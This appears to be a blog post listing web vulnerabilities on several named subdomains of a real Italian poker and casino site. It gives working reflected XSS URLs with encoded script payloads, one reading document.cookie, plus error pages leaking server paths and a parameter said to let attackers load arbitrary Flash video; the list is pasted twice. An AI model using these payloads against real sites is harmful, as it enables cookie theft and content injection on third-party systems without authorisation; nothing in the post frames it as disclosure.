XSS (this one will also work after that the victim clicks on any link of the page)
http://casino.peoples.it/?homeRealm=http://www.kpoker.it/&s=%22%3E%3Cvideo%20src=1%20onerror=alert%28String.fromCharCode%28112,97,115,115,101,100%29%29%20%3Ehttp://www.kpoker.it/
-----
http://www.tv.peoples.it/wp-content/themes/on-demand/
Fatal error: Call to undefined function get_header() in /var/www/vhosts/peoplespoker.tv/httpdocs/wp-content/themes/on-demand/index.php on line 1
----
free info
http://calendario.peoples.it/lepokerine/common/video_gallery.php?id=1
Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/video_gallery.php on line 2
http://calendario.peoples.it/lepokerine/common/photo_gallery.php?id=1
Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/photo_gallery.php on line 2
----
XSS
http://calendario.peoples.it/lepokerine/common/video_gallery.php?id=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3C%22
can be included another xml from the Flash video and we can load any other (porn?) movie
http://calendario.peoples.it/lepokerine/common/video_gallery_cont.php?id=&xmlfiletype=Default
http://casino.peoples.it/?homeRealm=http://www.kpoker.it/&s=%22%3E%3Cvideo%20src=1%20onerror=alert%28String.fromCharCode%28112,97,115,115,101,100%29%29%20%3Ehttp://www.kpoker.it/
-----
http://www.tv.peoples.it/wp-content/themes/on-demand/
Fatal error: Call to undefined function get_header() in /var/www/vhosts/peoplespoker.tv/httpdocs/wp-content/themes/on-demand/index.php on line 1
----
free info
http://calendario.peoples.it/lepokerine/common/video_gallery.php?id=1
Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/video_gallery.php on line 2
http://calendario.peoples.it/lepokerine/common/photo_gallery.php?id=1
Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/photo_gallery.php on line 2
----
XSS
http://calendario.peoples.it/lepokerine/common/video_gallery.php?id=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3C%22
can be included another xml from the Flash video and we can load any other (porn?) movie
http://calendario.peoples.it/lepokerine/common/video_gallery_cont.php?id=&xmlfiletype=Default
Comments
Post a Comment